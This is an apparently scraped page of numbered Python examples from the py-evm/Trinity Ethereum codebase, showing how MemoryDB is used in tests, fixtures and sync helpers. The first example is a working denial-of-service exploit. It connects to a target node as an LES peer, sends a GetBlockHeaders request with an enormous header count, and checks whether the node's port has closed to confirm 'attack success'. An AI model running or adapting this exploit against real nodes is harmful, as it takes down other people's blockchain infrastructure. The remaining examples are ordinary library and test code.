Пример #1
0
def _exp(node_url, chain) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id':
            1,
            'query':
            GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff,
                                 False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed,attack success ...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Пример #2
0
    def create_block(cls, transaction_packages, prev_hashes, coinbase,
                     parent_header):
        """
        Create a block with transaction witness
        """
        block = cls.generate_block_from_parent_header_and_coinbase(
            parent_header,
            coinbase,
        )

        recent_trie_nodes = {}
        receipts = []
        for (transaction, transaction_witness) in transaction_packages:
            transaction_witness.update(recent_trie_nodes)
            witness_db = BaseChainDB(MemoryDB(transaction_witness))

            execution_context = ExecutionContext.from_block_header(
                block.header, prev_hashes)
            vm_state = cls.get_state_class()(
                chaindb=witness_db,
                execution_context=execution_context,
                state_root=block.header.state_root,
                receipts=receipts,
            )
            computation, result_block, _ = vm_state.apply_transaction(
                transaction=transaction,
                block=block,
                is_stateless=True,
            )

            if not computation.is_error:
                block = result_block
                receipts = computation.vm_state.receipts
                recent_trie_nodes.update(
                    computation.vm_state.access_logs.writes)
            else:
                pass

        # Finalize
        witness_db = BaseChainDB(MemoryDB(recent_trie_nodes))
        execution_context = ExecutionContext.from_block_header(
            block.header, prev_hashes)
        vm_state = cls.get_state_class()(
            chaindb=witness_db,
            execution_context=execution_context,
            state_root=block.header.state_root,
            receipts=receipts,
        )
        block = vm_state.finalize_block(block)

        return block
Пример #3
0
def _test():
    import argparse
    from evm.p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = BaseChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                         ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(downloader.run())
    except KeyboardInterrupt:
        pass

    loop.run_until_complete(downloader.stop())
    loop.run_until_complete(peer_pool.stop())
    loop.close()
Пример #4
0
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)

    network_id = 1
    discovery = None
    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), network_id,
                    INITIATOR_PRIVKEY, discovery)
    nodes = [RECEIVER_REMOTE]
    await pool._connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Пример #5
0
async def test_shard_syncer(connections, request, event_loop):
    peers_by_server = {}
    for server_id1, server_id2 in connections:
        peer1, peer2 = await get_directly_linked_sharding_peers(
            request, event_loop)
        peers_by_server.setdefault(server_id1, []).append(peer1)
        peers_by_server.setdefault(server_id2, []).append(peer2)

    syncers = []
    for _, peers in sorted(peers_by_server.items()):
        peer_pool = MockPeerPoolWithConnectedPeers(peers)
        shard_db = ShardDB(MemoryDB())
        syncer = ShardSyncer(Shard(shard_db, 0), peer_pool)
        syncers.append(syncer)
        asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(
            asyncio.gather(*[syncer.cancel() for syncer in syncers]))

    request.addfinalizer(finalizer)

    # let each node propose and check that collation appears at all other nodes
    for proposer in syncers:
        collation = proposer.propose()
        await asyncio.wait_for(asyncio.gather(*[
            syncer.collations_received_event.wait() for syncer in syncers
            if syncer != proposer
        ]),
                               timeout=2)
        for syncer in syncers:
            assert syncer.shard.get_collation_by_hash(
                collation.hash) == collation
Пример #6
0
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)
    # We need this to ensure the server can check if the peer pool is full for
    # incoming connections.
    monkeypatch.setattr(receiver_server_with_dumb_peer, 'peer_pool',
                        MockPeerPool())

    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), NETWORK_ID,
                    INITIATOR_PRIVKEY, tuple())
    nodes = [RECEIVER_REMOTE]
    await pool.connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Пример #7
0
async def test_syncer_requests_new_collations(request, event_loop):
    # setup a-b topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(request, event_loop)
    peer_a_b_subscriber = MockPeerPoolSubscriber()
    peer_a_b.add_subscriber(peer_a_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())
    request.addfinalizer(finalizer)

    # notify b about new hashes at a and check that it requests them
    hashes_and_periods = ((b"\xaa" * 32, 0),)
    peer_a_b.sub_proto.send_new_collation_hashes(hashes_and_periods)
    peer, cmd, msg = await asyncio.wait_for(
        peer_a_b_subscriber.msg_queue.get(),
        timeout=1,
    )
    assert peer == peer_a_b
    assert isinstance(cmd, GetCollations)
    assert msg["collation_hashes"] == (hashes_and_periods[0][0],)
Пример #8
0
async def test_syncer_proposing(request, event_loop):
    # setup a-b topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(request, event_loop)
    peer_a_b_subscriber = MockPeerPoolSubscriber()
    peer_a_b.add_subscriber(peer_a_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())
    request.addfinalizer(finalizer)

    # propose at b and check that it announces its proposal
    syncer.propose()
    peer, cmd, msg = await asyncio.wait_for(
        peer_a_b_subscriber.msg_queue.get(),
        timeout=1,
    )
    assert peer == peer_a_b
    assert isinstance(cmd, NewCollationHashes)
    assert len(msg["collation_hashes_and_periods"]) == 1
    proposed_hash = msg["collation_hashes_and_periods"][0][0]

    # test that the collation has been added to the shard
    shard.get_collation_by_hash(proposed_hash)
Пример #9
0
def _make_trie_root_and_nodes(items: Tuple[bytes, ...]) -> Tuple[bytes, Dict[bytes, bytes]]:
    kv_store = {}  # type: Dict[bytes, bytes]
    trie = HexaryTrie(MemoryDB(kv_store), BLANK_ROOT_HASH)
    for index, item in enumerate(items):
        index_key = rlp.encode(index, sedes=rlp.sedes.big_endian_int)
        trie[index_key] = item
    return trie.root_hash, kv_store
Пример #10
0
 def __init__(
     self,
     privkey: datatypes.PrivateKey,
     address: Address,
     network_id: int,
     min_peers: int = 0,
     peer_class: Type[BasePeer] = ShardingPeer,
     peer_pool_class: Type[PeerPool] = PeerPool,
     bootstrap_nodes: List[str] = [],
 ) -> None:
     BaseService.__init__(self, CancelToken('ShardingServer'))
     self.privkey = privkey
     self.address = address
     self.network_id = network_id
     self.peer_class = peer_class
     self.discovery = DiscoveryProtocol(self.privkey,
                                        self.address,
                                        bootstrap_nodes=bootstrap_nodes)
     # XXX: This is not supposed to work and causes both the PeerPool and Server to crash, but
     # the tests in test_sharding.py don't seem to care
     self.headerdb = None
     self.peer_pool = peer_pool_class(
         peer_class,
         self.headerdb,
         self.network_id,
         self.privkey,
         self.discovery,
         min_peers=min_peers,
     )
     shard_db = ShardDB(MemoryDB())
     shard = Shard(shard_db, 0)
     self.syncer = ShardSyncer(shard, self.peer_pool,
                               self.cancel_token)  # type: ignore
Пример #11
0
def chaindb_mainnet_100():
    """Return a chaindb with mainnet headers numbered from 0 to 100."""
    here = os.path.dirname(__file__)
    headers_rlp = open(os.path.join(here, 'testdata', 'sample_1000_headers_rlp'), 'r+b').read()
    headers = rlp.decode(headers_rlp, sedes=sedes.CountableList(BlockHeader))
    chaindb = BaseChainDB(MemoryDB())
    for i in range(0, 101):
        chaindb.persist_header_to_db(headers[i])
    return chaindb
Пример #12
0
def headerdb_mainnet_100():
    """Return a headerdb with mainnet headers numbered from 0 to 100."""
    here = os.path.dirname(__file__)
    headers_rlp = open(os.path.join(here, 'fixtures', 'sample_1000_headers_rlp'), 'r+b').read()
    headers = rlp.decode(headers_rlp, sedes=sedes.CountableList(BlockHeader))
    headerdb = FakeAsyncChainDB(MemoryDB())
    for i in range(0, 101):
        headerdb.persist_header(headers[i])
    return headerdb
Пример #13
0
def db(request):
    base_db = MemoryDB()
    if request.param is JournalDB:
        return JournalDB(base_db)
    elif request.param is BatchDB:
        return BatchDB(base_db)
    elif request.param is MemoryDB:
        return base_db
    else:
        raise Exception("Invariant")
Пример #14
0
def make_trie_root_and_nodes(transactions, trie_class=HexaryTrie):
    chaindb = BaseChainDB(MemoryDB())
    db = chaindb.db
    transaction_db = trie_class(db)

    for index, transaction in enumerate(transactions):
        index_key = rlp.encode(index, sedes=rlp.sedes.big_endian_int)
        transaction_db[index_key] = rlp.encode(transaction)

    return transaction_db.root_hash, transaction_db.db.wrapped_db.kv_store
Пример #15
0
def test_access_restriction():
    # populate db
    state = ShardingAccountStateDB(MemoryDB())
    state.set_balance(ADDRESS, 2)
    state.set_code(ADDRESS, b"code")
    state.set_storage(ADDRESS, 123, 4)

    original_db = state.db
    original_root_hash = state.root_hash

    def make_state(access_list):
        kv_store = copy.deepcopy(original_db.wrapped_db.kv_store)
        db = MemoryDB(kv_store)
        return ShardingAccountStateDB(db,
                                      original_root_hash,
                                      access_list=access_list)

    # access lists to use
    CODE_ACCESS_LIST = [get_code_key(ADDRESS)]
    BALANCE_ACCESS_LIST = [get_balance_key(ADDRESS)]
    STORAGE_ACCESS_LIST = [get_storage_key(ADDRESS, 123)]

    # test with access list
    state = make_state(BALANCE_ACCESS_LIST)
    state.get_balance(ADDRESS)
    state.set_balance(ADDRESS, 3)
    state.delta_balance(ADDRESS, 1)

    state = make_state(CODE_ACCESS_LIST)
    state.get_code(ADDRESS)
    state.set_code(ADDRESS, b"new_code")

    state = make_state(STORAGE_ACCESS_LIST)
    state.get_storage(ADDRESS, 123)
    state.set_storage(ADDRESS, 123, 5)

    # test without access list
    state = make_state([])
    with pytest.raises(UnannouncedStateAccess):
        state.get_balance(ADDRESS)
    with pytest.raises(UnannouncedStateAccess):
        state.set_balance(ADDRESS, 3)
    with pytest.raises(UnannouncedStateAccess):
        state.delta_balance(ADDRESS, 1)

    with pytest.raises(UnannouncedStateAccess):
        state.get_code(ADDRESS)
    with pytest.raises(UnannouncedStateAccess):
        state.set_code(ADDRESS, b"new_code")

    with pytest.raises(UnannouncedStateAccess):
        state.get_storage(ADDRESS, 123)
    with pytest.raises(UnannouncedStateAccess):
        state.set_storage(ADDRESS, 123, 5)
Пример #16
0
def get_chain(vm: Type[BaseVM]) -> Chain:
    return chain_without_pow(
        MemoryDB(), vm, GENESIS_PARAMS,
        genesis_state([
            AddressSetup(address=FUNDED_ADDRESS,
                         balance=DEFAULT_INITIAL_BALANCE,
                         code=b''),
            AddressSetup(address=SECOND_EXISTING_ADDRESS,
                         balance=DEFAULT_INITIAL_BALANCE,
                         code=b'')
        ]))
Пример #17
0
def get_server(privkey, address, peer_class):
    bootstrap_nodes = []
    chaindb = ChainDB(MemoryDB())
    server = Server(
        privkey,
        address,
        chaindb,
        bootstrap_nodes,
        network_id=1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Пример #18
0
def chaindb_20():
    chain = PoWMiningChain.from_genesis(MemoryDB(), GENESIS_PARAMS, GENESIS_STATE)
    for i in range(20):
        tx = chain.create_unsigned_transaction(
            nonce=i,
            gas_price=1234,
            gas=1234000,
            to=RECEIVER.public_key.to_canonical_address(),
            value=i,
            data=b'',
        )
        chain.apply_transaction(tx.as_signed_transaction(SENDER))
        chain.mine_block()
    return chain.chaindb
Пример #19
0
def get_server(privkey, address, bootstrap_nodes=None, peer_class=DumbPeer):
    if bootstrap_nodes is None:
        bootstrap_nodes = []
    chaindb = ChainDB(MemoryDB())
    server = Server(
        privkey,
        address,
        chaindb,
        bootstrap_nodes,
        1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Пример #20
0
def new_chain_from_fixture(fixture):
    base_db = MemoryDB()

    vm_config = chain_vm_configuration(fixture)

    ChainFromFixture = MainnetChain.configure(
        'ChainFromFixture',
        vm_configuration=vm_config,
    )

    return ChainFromFixture.from_genesis(
        base_db,
        genesis_params=genesis_params_from_fixture(fixture),
        genesis_state=fixture['pre'],
    )
Пример #21
0
def make_random_state(n):
    state_db = MainAccountStateDB(MemoryDB())
    contents = {}
    for _ in range(n):
        addr = os.urandom(20)
        state_db.touch_account(addr)
        balance = random.randint(0, 10000)
        state_db.set_balance(addr, balance)
        nonce = random.randint(0, 10000)
        state_db.set_nonce(addr, nonce)
        storage = random.randint(0, 10000)
        state_db.set_storage(addr, 0, storage)
        code = b'not-real-code'
        state_db.set_code(addr, code)
        contents[addr] = (balance, nonce, storage, code)
    return state_db, contents
Пример #22
0
def get_server(privkey, address, peer_class):
    base_db = MemoryDB()
    headerdb = HeaderDB(base_db)
    chaindb = ChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = RopstenChain(base_db)
    server = Server(
        privkey,
        address.tcp_port,
        chain,
        chaindb,
        headerdb,
        base_db,
        network_id=NETWORK_ID,
        peer_class=peer_class,
    )
    return server
Пример #23
0
def test_pow_mining():
    sender = keys.PrivateKey(
        decode_hex(
            "49a7b37aa6f6645917e7b807e9d1c00d4fa71f18343b0d4122a4d2df64dd6fee")
    )
    receiver = keys.PrivateKey(
        decode_hex(
            "b71c71a67e1177ad4e901695e1b4b9ee17ae16c6668d313eac2f96dbcda3f291")
    )
    genesis_params = {
        'parent_hash': constants.GENESIS_PARENT_HASH,
        'uncles_hash': constants.EMPTY_UNCLE_HASH,
        'coinbase': constants.ZERO_ADDRESS,
        'transaction_root': constants.BLANK_ROOT_HASH,
        'receipt_root': constants.BLANK_ROOT_HASH,
        'bloom': 0,
        'difficulty': 5,
        'block_number': constants.GENESIS_BLOCK_NUMBER,
        'gas_limit': constants.GENESIS_GAS_LIMIT,
        'gas_used': 0,
        'timestamp': 1514764800,
        'extra_data': constants.GENESIS_EXTRA_DATA,
        'nonce': constants.GENESIS_NONCE
    }
    state = {
        sender.public_key.to_canonical_address(): {
            "balance": 100000000000000000,
            "code": b"",
            "nonce": 0,
            "storage": {}
        }
    }
    chain = PowMiningChain.from_genesis(MemoryDB(), genesis_params, state)
    for i in range(10):
        tx = chain.create_unsigned_transaction(
            nonce=i,
            gas_price=1234,
            gas=1234000,
            to=receiver.public_key.to_canonical_address(),
            value=i,
            data=b'',
        )
        chain.apply_transaction(tx.as_signed_transaction(sender))
        block = chain.mine_block()
        assert block.number == i + 1
        assert chain.header.block_number == i + 2
Пример #24
0
def get_server(privkey, address, peer_class):
    db = MemoryDB()
    headerdb = HeaderDB(db)
    chaindb = ChainDB(db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = RopstenChain(chaindb)
    server = Server(
        privkey,
        address,
        chain,
        chaindb,
        headerdb,
        db,
        network_id=1,
        min_peers=1,
        peer_class=peer_class,
    )
    return server
Пример #25
0
def test_state_sync():
    state_db, contents = make_random_state(1000)
    dest_db = MemoryDB()
    scheduler = StateSync(state_db.root_hash, dest_db)
    requests = scheduler.next_batch(10)
    while requests:
        results = []
        for request in requests:
            results.append([request.node_key, state_db.db[request.node_key]])
        scheduler.process(results)
        requests = scheduler.next_batch(10)
    dest_state = MainAccountStateDB(dest_db, state_db.root_hash)
    for addr, account_data in contents.items():
        balance, nonce, storage, code = account_data
        assert dest_state.get_balance(addr) == balance
        assert dest_state.get_nonce(addr) == nonce
        assert dest_state.get_storage(addr, 0) == storage
        assert dest_state.get_code(addr) == code
Пример #26
0
def make_random_state(n):
    raw_db = MemoryDB()
    account_db = AccountDB(raw_db)
    contents = {}
    for _ in range(n):
        addr = os.urandom(20)
        account_db.touch_account(addr)
        balance = random.randint(0, 10000)
        account_db.set_balance(addr, balance)
        nonce = random.randint(0, 10000)
        account_db.set_nonce(addr, nonce)
        storage = random.randint(0, 10000)
        account_db.set_storage(addr, 0, storage)
        code = b'not-real-code'
        account_db.set_code(addr, code)
        contents[addr] = (balance, nonce, storage, code)
    account_db.persist()
    return raw_db, account_db.state_root, contents
Пример #27
0
async def test_new_collations_notification(request, event_loop):
    # setup a-b-c topology
    peer_a_b, peer_b_a = await get_directly_linked_sharding_peers(
        request, event_loop)
    peer_b_c, peer_c_b = await get_directly_linked_sharding_peers(
        request, event_loop)
    peer_c_b_subscriber = asyncio.Queue()
    peer_c_b.add_subscriber(peer_c_b_subscriber)
    peer_pool_b = MockPeerPoolWithConnectedPeers([peer_b_a, peer_b_c])

    # setup shard dbs at b
    shard_db = ShardDB(MemoryDB())
    shard = Shard(shard_db, 0)

    # start shard syncer
    syncer = ShardSyncer(shard, peer_pool_b)
    asyncio.ensure_future(syncer.run())

    def finalizer():
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    # send collation from a to b and check that c gets notified
    c1 = next(collations)
    peer_a_b.sub_proto.send_collations(0, [c1])
    peer, cmd, msg = await asyncio.wait_for(
        peer_c_b_subscriber.get(),
        timeout=1,
    )
    assert peer == peer_c_b
    assert isinstance(cmd, NewCollationHashes)
    assert msg["collation_hashes_and_periods"] == ((c1.hash, c1.period), )

    # check that c won't be notified about c1 again
    c2 = next(collations)
    peer_a_b.sub_proto.send_collations(0, [c1, c2])
    peer, cmd, msg = await asyncio.wait_for(
        peer_c_b_subscriber.get(),
        timeout=1,
    )
    assert peer == peer_c_b
    assert isinstance(cmd, NewCollationHashes)
    assert msg["collation_hashes_and_periods"] == ((c2.hash, c2.period), )
Пример #28
0
def _test():
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Пример #29
0
def base_db():
    return MemoryDB()
Пример #30
0
def get_fresh_mainnet_chaindb():
    chaindb = BaseChainDB(MemoryDB())
    chaindb.persist_header_to_db(MAINNET_GENESIS_HEADER)
    return chaindb